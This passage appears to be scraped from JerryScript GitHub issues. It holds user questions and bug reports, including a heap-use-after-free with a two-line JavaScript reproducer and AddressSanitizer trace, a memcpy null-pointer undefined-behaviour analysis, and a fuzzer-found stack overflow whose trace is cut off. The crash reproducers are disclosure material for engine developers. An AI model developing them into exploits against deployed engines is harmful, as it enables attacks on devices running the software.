115, 116, 114, 105, 110, 103, 41, 59, 32, 125);
`
I got error message like: `SyntaxError: Maximum number of function arguments reached.`
I did review the code, seems like the number of arguments is limited by CBC_MAXIMUM_BYTE_VALUE. Is there any way to overcome this limit? | How could I execute function with more than 500 parameters? | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4326/comments | 6 | 2020-11-03T22:35:05Z | 2020-11-04T18:50:13Z | https://github.com/jerryscript-project/jerryscript/issues/4326 | 735,679,403 | 4,326 |
[
"jerryscript-project",
"jerryscript"
]
| How do I activate the ES6 module system? | ES6 module | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4324/comments | 2 | 2020-11-02T13:17:42Z | 2020-11-05T11:44:45Z | https://github.com/jerryscript-project/jerryscript/issues/4324 | 734,498,889 | 4,324 |
[
"jerryscript-project",
"jerryscript"
]
| Is there any way to show debug info (function parameters, op calls etc..) while executing a snapshot? If not, could that be added? | Show opcodes from Snapshot | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4322/comments | 10 | 2020-11-01T03:11:38Z | 2020-11-16T11:17:42Z | https://github.com/jerryscript-project/jerryscript/issues/4322 | 733,854,300 | 4,322 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3bad85b83b12e19bad65bec65aea3c0162582009
(latest master - 2020.10.30.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --line-info=on --error-messages=on --logging=on --stack-limit=0 --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-O2 --system-allocator=on --mem-stress-test=on
###### Test case
found by test262-esnext tests with ASAN build options:
built-ins/Object/defineProperties/15.2.3.7-6-a-302.js
built-ins/Object/defineProperties/15.2.3.7-6-a-303.js
built-ins/Object/defineProperties/15.2.3.7-6-a-304.js
built-ins/Object/defineProperties/15.2.3.7-6-a-305.js
built-ins/Object/defineProperties/15.2.3.7-6-a-306.js
built-ins/Object/defineProperties/15.2.3.7-6-a-307.js
built-ins/Object/defineProperties/15.2.3.7-6-a-308.js
built-ins/Object/defineProperties/15.2.3.7-6-a-309.js
built-ins/Object/defineProperties/15.2.3.7-6-a-310.js
built-ins/Object/defineProperties/15.2.3.7-6-a-311.js
built-ins/Object/defineProperties/15.2.3.7-6-a-312.js
built-ins/Object/defineProperties/15.2.3.7-6-a-313.js
built-ins/Object/defineProperty/15.2.3.6-4-333-3.js
built-ins/Object/defineProperty/15.2.3.6-4-333-8.js
built-ins/Object/defineProperty/15.2.3.6-4-354-12.js
built-ins/Object/defineProperty/15.2.3.6-4-354-3.js
built-ins/Object/defineProperty/15.2.3.6-4-531-12.js
built-ins/Object/defineProperty/15.2.3.6-4-531-3.js
built-ins/Object/defineProperty/15.2.3.6-4-540-3.js
built-ins/Object/defineProperty/15.2.3.6-4-540-8.js
$ cat tests/test262/esnext/harness/sta.js tests/test262/esnext/harness/assert.js tests/test262/esnext/harness/propertyHelper.js tests/test262/esnext/test/built-ins/Object/defineProperty/15.2.3.6-4-333-3.js >test.js
$ build/bin/jerry test.js
small test case based on built-ins/Object/defineProperty/15.2.3.6-4-333-3.js
```
var obj = (function() { return arguments; }());
for (var x in obj) {};
```
###### Output
```
=================================================================
==9166==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5e01d80 at pc 0x565ba904 bp 0xff8a9568 sp 0xff8a9558
READ of size 2 at 0xf5e01d80 thread T0
#0 0x565ba903 in ecma_ref_object /home/oszi/jerryscript/jerry-core/ecma/base/ecma-gc.c:132
#1 0x5661b54b in ecma_copy_value /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:917
#2 0x565df061 in ecma_op_object_get_own_property_descriptor /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1856
#3 0x565cbcdf in ecma_op_object_enumerate /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2461
#4 0x565cbcdf in opfunc_for_in /home/oszi/jerryscript/jerry-core/vm/opcodes.c:361
#5 0x565cbcdf in vm_loop.lto_priv.159 /home/oszi/jerryscript/jerry-core/vm/vm.c:3968
#6 0x566da5c1 in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4935
#7 0x566dc908 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:5042
#8 0x566a47ef in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:971
#9 0x566a5717 in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1173
#10 0x566dbe5f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:806
#11 0x566dbe5f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4941
#12 0x566dc908 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:5042
#13 0x566a47ef in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:971
#14 0x566a5717 in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1173
#15 0x566dbe5f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:806
#16 0x566dbe5f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4941
#17 0x566dc908 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:5042
#18 0x565bad56 in vm_run_global /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#19 0x565bad56 in jerry_run /home/oszi/jerryscript/jerry-core/api/jerry.c:593
#20 0x565a68dd in main /home/oszi/jerryscript/jerry-main/main-unix.c:123
#21 0xf7740e90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
#22 0x565a8c28 (/home/oszi/jerryscript/build/bin/jerry+0x21c28)
0xf5e01d80 is located 0 bytes inside of 24-byte region [0xf5e01d80,0xf5e01d98)
freed by thread T0 here:
#0 0xf79e9b94 in __interceptor_free (/usr/lib32/libasan.so.4+0xe5b94)
#1 0x565a8a94 in jmem_heap_free_block_internal /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:478
#2 0x565b8069 in jmem_heap_free_block /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:692
#3 0x565b8069 in ecma_dealloc_extended_object /home/oszi/jerryscript/jerry-core/ecma/base/ecma-alloc.c:123
#4 0x565b8069 in ecma_gc_free_object /home/oszi/jerryscript/jerry-core/ecma/base/ecma-gc.c:1612
#5 0x565b8069 in ecma_gc_run /home/oszi/jerryscript/jerry-core/ecma/base/ecma-gc.c:1740
#6 0x5667d0fe in jmem_heap_gc_and_alloc_block.lto_priv.66 /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:285
#7 0x565b2d74 in jmem_heap_alloc_block_internal /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:310
#8 0x565b2d74 in ecma_alloc_string_buffer /home/oszi/jerryscript/jerry-core/ecma/base/ecma-alloc.c:222
#9 0x565b2d74 in ecma_new_ecma_string_from_utf8_buffer /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:263
#10 0x565b2d74 in ecma_append_chars_to_string /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:757
#11 0x565b2d74 in ecma_concat_ecma_strings /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:820
#12 0x565cd7f7 in opfunc_addition /home/oszi/jerryscript/jerry-core/vm/opcodes-ecma-arithmetics.c:237
#13 0x565cd7f7 in vm_loop.lto_priv.159 /home/oszi/jerryscript/jerry-core/vm/vm.c:3325
#14 0x566da5c1 in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4935
#15 0x566dc908 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:5042
#16 0x566a47ef in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:971
#17 0x566a5717 in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1173
#18 0x566dbe5f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:806
#19 0x566dbe5f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4941
#20 0x566dc908 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:5042
#21 0x565bad56 in vm_run_global /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#22 0x565bad56 in jerry_run /home/oszi/jerryscript/jerry-core/api/jerry.c:593
#23 0x565a68dd in main /home/oszi/jerryscript/jerry-main/main-unix.c:123
#24 0xf7740e90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
previously allocated by thread T0 here:
#0 0xf79e9f54 in malloc (/usr/lib32/libasan.so.4+0xe5f54)
#1 0x565a887a in jmem_heap_alloc /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x5667d0d9 in jmem_heap_gc_and_alloc_block.lto_priv.66 /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x56615d4c in jmem_heap_alloc_block_internal /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:310
#4 0x56615d4c in ecma_alloc_extended_object /home/oszi/jerryscript/jerry-core/ecma/base/ecma-alloc.c:109
#5 0x56615d4c in ecma_create_object /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers.c:82
#6 0x566a1383 in ecma_op_create_function_object.lto_priv.48 /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:268
#7 0x566da1b5 in ecma_op_create_any_function_object /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:486
#8 0x566da1b5 in vm_construct_literal_object.isra.0.lto_priv.169 /home/oszi/jerryscript/jerry-core/vm/vm.c:483
#9 0x565be540 in vm_loop.lto_priv.159 /home/oszi/jerryscript/jerry-core/vm/vm.c:1099
#10 0x566da5c1 in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4935
#11 0x566dc908 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:5042
#12 0x565bad56 in vm_run_global /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#13 0x565bad56 in jerry_run /home/oszi/jerryscript/jerry-core/api/jerry.c:593
#14 0x565a68dd in main /home/oszi/jerryscript/jerry-main/main-unix.c:123
#15 0xf7740e90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
SUMMARY: AddressSanitizer: heap-use-after-free /home/oszi/jerryscript/jerry-core/ecma/base/ecma-gc.c:132 in ecma_ref_object
Shadow bytes around the buggy address:
0x3ebc0360: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00
0x3ebc0370: 00 fa fa fa fd fd fd fa fa fa 00 00 00 fa fa fa
0x3ebc0380: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x3ebc0390: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00
0x3ebc03a0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
=>0x3ebc03b0:[fd]fd fd fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x3ebc03c0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
0x3ebc03d0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
0x3ebc03e0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x3ebc03f0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
0x3ebc0400: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==9166==ABORTING
```
###### Expected behavior
no heap use after free
note: Issue can be reproduced since 75385a604552e1e264fb9204cb3c343bea3dce47 (#4145) | heap-use-after-free error on defineProperty related tests | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4321/comments | 0 | 2020-10-30T16:22:17Z | 2020-11-24T04:19:17Z | https://github.com/jerryscript-project/jerryscript/issues/4321 | 733,321,144 | 4,321 |
[
"jerryscript-project",
"jerryscript"
]
| [Analysis of JerryScript test `test-literal-storage.c` using TrustInSoft CI](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/11?page=2&test=29) has shown that the function `lit_is_utf8_string_magic` (in file `lit-magic-strings.c`) sometimes calls `memcpy` with a null pointer as argument:
https://github.com/jakub-zwolakowski/jerryscript/blob/90c97fee6ca924a7c6bf42e07705cbe720ac89c0/jerry-core/lit/lit-magic-strings.c#L218
Passing a null pointer to a C library function like `memcpy` is dangerous, even if done together with the size argument equal zero.
Some compilers perform optimizations based on the assumption that such a function never receives a null pointer. GCC started to optimize this behavior aggressively in its 4.9 version with the optimization `-fdelete-null-pointer-checks` (it is discussed in this blog post: http://blog.mycre.ws/articles/bind-and-gcc-49/). This is an example of a program that passes a null pointer to `memcpy`:
```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
__attribute__((noinline))
void f(char *p, int n) {
if (n > 10) abort();
memcpy(p, "0123456789", n);
if (p == NULL) {
printf("f was called with NULL\n");
}
else {
printf("f was called with a non-NULL pointer\n");
printf("this is the value of p:%p or 0x%llx\n", p, (unsigned long long) p);
}
}
int main(void) {
f(NULL, 0);
}
```
Binaries produced when compiling this program with GCC 7.5.0 print different results when run with different optimization settings:
```
$ gcc --version
gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
Copyright (C) 2017 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ gcc test.c -O0 && ./a.out
f was called with NULL
$ gcc test.c -O2 && ./a.out
f was called with a non-NULL pointer
this is the value of p:(nil) or 0x0
```
(You can see how the generated code looks like in Compiler Explorer for these two cases in GCC 10.2: [with optimization level 0](https://godbolt.org/z/sGc7ej) and [with optimization level 2](https://godbolt.org/z/GEjqzr). Note that in the latter case the whole `p == NULL` check disappears.)
This is not a GCC bug. This behavior is present in GCC already for several versions. What the compiler does is legal as the program passes a null pointer to `memcpy` which is forbidden by [clause 7.1.4:1 in C17](https://cigix.me/c17#7.1.4.p1) (and this clause is already present in C99):
> Each of the following statements applies unless explicitly stated otherwise in the detailed descrip-
> tions that follow: If an argument to a function has an invalid value (such as a value outside the
> domain of the function, or a pointer outside the address space of the program, or a null pointer, or a
> pointer to non-modifiable storage when the corresponding parameter is not const-qualified) or a
> type (after promotion) not expected by a function with variable number of arguments, the behavior
> is undefined.
The program's behavior is undefined, so GCC can rightfully do whatever it finds most appropriate. And what it finds most appropriate (for optimization reasons) in this case is to suppose that any pointer `p` that was passed as an argument to `memcpy` is non-null. | Invalid memcpy call | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4319/comments | 6 | 2020-10-30T11:32:03Z | 2021-01-11T11:49:06Z | https://github.com/jerryscript-project/jerryscript/issues/4319 | 733,100,280 | 4,319 |
[
"jerryscript-project",
"jerryscript"
]
| # Build environment:
Ubuntu 16.04
gcc 5.4.0
jerry version: 6f25d6e
build command: python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on
test command: ./xst poc
# Target device:
Desktop Linux
# POC
[jerry-002545.txt](https://github.com/jerryscript-project/jerryscript/files/5406824/jerry-002545.txt)
# Description
Below is the ASAN outputs.
ASAN:SIGSEGV
=================================================================
==62415==ERROR: AddressSanitizer: stack-overflow on address 0xff2d2ffc (pc 0x080a8740 bp 0xff2d3018 sp 0xff2d3000 T0)
#0 0x80a873f in ecma_is_lexical_environment /home/keven/Fuzzing/jerry-test/jerry-core/ecma/base/ecma-helpers.c:177
#1 0x80a873f in ecma_get_object_type /home/keven/Fuzzing/jerry-test/jerry-core/ecma/base/ecma-helpers.c:203
#2 0x812634c in ecma_op_object_get_with_receiver /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-objects.c:799
#3 0x812625c in ecma_op_object_get /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-objects.c:774
#4 0x80c6f9d in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:625
#5 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#6 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#7 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#8 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#9 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#10 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#11 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#12 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#13 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#14 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#15 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#16 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#17 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#18 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#19 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#20 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#21 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#22 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#23 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#24 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#25 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#26 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#27 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#28 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#29 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#30 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#31 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#32 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#33 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#34 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#35 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#36 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#37 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#38 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#39 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#40 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#41 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#42 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#43 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#44 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#45 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#46 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#47 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#48 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#49 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#50 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#51 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#52 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#53 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#54 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#55 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#56 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#57 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#58 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#59 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#60 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#61 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#62 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#63 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#64 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#65 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#66 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#67 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#68 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#69 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#70 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#71 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#72 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#73 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#74 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#75 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#76 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#77 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#78 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#79 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#80 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#81 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#82 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#83 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#84 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#85 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#86 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#87 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#88 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#89 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
